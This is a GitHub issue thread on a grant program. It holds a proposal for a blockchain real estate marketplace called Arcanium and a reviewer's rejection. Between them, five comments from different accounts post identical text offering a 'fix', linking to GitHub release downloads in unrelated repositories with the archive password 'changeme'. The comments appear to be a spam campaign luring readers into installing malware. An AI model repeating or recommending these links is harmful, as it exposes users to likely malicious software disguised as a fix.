### ISSUE TITLE
Arcanium

### ISSUE THREAD

**Issue by an0n99** [filecoin-project/devgrants#1788]
I started to enter the blockchain and crypto space 3 years ago, when I heard about NFTs during the 2021 period. I blindly bought a cheap NFT and it lost significant value. However, I used this as a learning opportunity, and spent the next two years educating myself about NFTs and blockchain technology along with the programming languages they primarily use (Solidity, Node.js and Rust). After 2 years, I decided to code my first project. A mining pool for $ORE, the proof of work coin on Solana, and a client to connect with this pool.
I never finished the client due to personal issues, but i had a fully working server and during the process of making this, I learnt so much. From using a VPS, installing packages I had never used before such as Diesel and Rust. I had many issues whilst coding this, so I reached out to other people in the $ORE and programming community to help with these issues. This drastically improved my communication skills and ability to take risks and just ask for help.

After this, I looked more into the Polygon chain (L2) and was amazed as to how they reduced fees and I learnt more about ERC-20 NFTs. At the same time, a relative was moving houses and complaining how stressful it is with the agents, moving and lawyers. I also visited a less developed country on holiday and noticed the lack of estate agents anywhere in this country. I searched the internet as to why, and discovered many people there cannot prove they own their house, thus making buying and selling hard. This is the case across many NEEs and LICs. Furthermore, people in these countries have a harder time to secure mortgages due to a lack of traditional banking.

All of this came together and gave me the idea of a real estate marketplace on the blockchain. By having real estate records on the blockchain, it is immutable and cannot be disputed, along with all records being preserved and easy transferring of ownership.
Furthermore, by having multiple people stake into mortgage pools, it reduce the risk of a default having a large effect. This allows people to more readily access financing.

For the past five months, I have ben refining this idea, designing a logo and building a frontend and MVP for the backend.
I hope you like my project and I look forward to hopefully working with you and solving many issues in a clunky real estate marketplace. 
Thank you for taking your time to read all of this and hopefully you will equally enjoy more information below

Pitch Deck :[ https://www.storydoc.com/d3db2c0165be14aef9ef412957fffe28/d9105a79-81b8-4ad5-83f2-73f39af55b15/66c201e95c8c2f8cef1ee60b](https://www.storydoc.com/d3db2c0165be14aef9ef412957fffe28/d9105a79-81b8-4ad5-83f2-73f39af55b15/66c201e95c8c2f8cef1ee60b)

Whitepaper:[ https://drive.google.com/file/d/1fAQiPxmhm-aAS2P3xQcJNbu1qR6pu1_j/view](https://drive.google.com/file/d/1fAQiPxmhm-aAS2P3xQcJNbu1qR6pu1_j/view)

Website: https://jgr929.wixsite.com/arcanium

**Comment by telfaw** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by louseee** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by robykartis** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by telfaw** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by 64dB0y** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ErinOCon** [comment]
Thank you for your time with this proposal. Unfortunately, we will not be moving forward with a grant. To contact our team with inquiries regarding our review or grants program, please send an email to grants@fil.org.

Wishing you the best as you continue building!
